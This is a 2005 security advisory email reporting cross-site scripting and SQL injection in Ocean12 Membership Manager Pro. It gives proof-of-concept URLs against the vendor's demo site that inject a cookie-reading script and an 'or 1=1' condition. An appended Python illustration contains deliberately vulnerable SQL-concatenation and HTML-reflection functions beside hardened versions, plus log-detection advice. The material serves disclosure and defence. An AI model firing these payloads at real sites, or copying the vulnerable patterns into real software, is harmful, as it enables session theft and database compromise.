From: Zinho
To: zone-h, Zinho, asd, securitytracker, securityfocus, security curmudgeon, SecuriTeam News, packetstorm1, k-otik2, k-otik1, "class101(at)HAT-SQUAD.com"
Date: Wed, 06 Apr 2005 19:50:59 +0200
Subject: [HSC Security Group] Ocean12 Membership Manager Pro : XSS and Sql injection

Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory

Title: Ocean12 Membership Manager Pro : XSS and SQL injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com

"A membership manager application designed to allow a website owner to easily add password protected areas to their website"

XSS

http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

SQL INJECTION

http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

The vendor was contacted more than a month ago. No response has been received.

Author: Zinho is webmaster and founder of http://www.hackerscenter.com, a security research portal.

Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp

zinho-no-spam (at) hackerscenter.com ====> Webmaster of .:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
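The two defects the advisory's proof-of-concept URLs exercise, shown as an added Python illustration rather than the vendor's classic-ASP code: the "UserID" value is concatenated into SQL text (so "0 or 1=1" matches every row) and the "page" value is reflected into an HTML attribute unencoded. The members table, column names and HTML fragment are constructed for the demo; only the two URLs are taken from the advisory. The hardened path validates "UserID" against an integer allow-list, binds it as a query parameter, and attribute-encodes "page" before output.

```python
# Added example (not the vendor's code): vulnerable and hardened handling of the
# UserID and page parameters from the advisory's proof-of-concept URLs.
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Proof-of-concept URLs as given in the advisory.
XSS_URL = ("http://www.ocean12scripts.com/products/membership/demo/main.asp?"
           "UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"
           "%3Cfont%20color=%22&Sort=Name&DisplayNumber=10")
SQLI_URL = ("http://www.ocean12scripts.com/products/membership/demo/main.asp?"
            "UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"
            "%3Cfont%20color=%22&Sort=Name&DisplayNumber=10")

# Constructed stand-in for the membership table (not real data).
MEMBERS = [(1, "alice"), (2, "bob"), (3, "carol")]


def make_db():
    """In-memory SQLite database holding the constructed members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (UserID INTEGER, Name TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    return conn


def query_params(url):
    """Decode the query string of a request URL into a flat dict."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def lookup_vulnerable(conn, user_id):
    """Concatenates UserID into the SQL text; '0 or 1=1' matches every row."""
    sql = "SELECT Name FROM members WHERE UserID=" + user_id
    return [row[0] for row in conn.execute(sql)]


def is_valid_user_id(user_id):
    """Allow-list check: UserID must be a plain decimal integer."""
    return user_id.isdigit()


def lookup_hardened(conn, user_id):
    """Validate the type first, then pass the value as a bound parameter."""
    if not is_valid_user_id(user_id):
        raise ValueError("UserID must be a decimal integer")
    rows = conn.execute("SELECT Name FROM members WHERE UserID=?", (int(user_id),))
    return [row[0] for row in rows]


def render_vulnerable(page):
    """Reflects 'page' verbatim inside a quoted attribute; a leading quote closes it."""
    return '<input type="hidden" name="page" value="' + page + '">'


def render_hardened(page):
    """Attribute-encodes 'page' so quotes and angle brackets stay inert."""
    return ('<input type="hidden" name="page" value="'
            + html.escape(page, quote=True) + '">')


def handle_request(conn, url):
    """Hardened request path: returns (matched names, rendered fragment)."""
    params = query_params(url)
    names = lookup_hardened(conn, params.get("UserID", ""))
    return names, render_hardened(params.get("page", ""))


if __name__ == "__main__":
    db = make_db()
    p = query_params(SQLI_URL)
    print("vulnerable:", lookup_vulnerable(db, p["UserID"]))  # every member
    print("vulnerable:", render_vulnerable(p["page"]))        # live <script>
    print("hardened:  ", handle_request(db, XSS_URL))
```

Detection-wise, the same `query_params` decode run over web server logs flags both requests: a non-numeric "UserID" and a "page" value containing "<" after percent-decoding are outside anything the application legitimately produces.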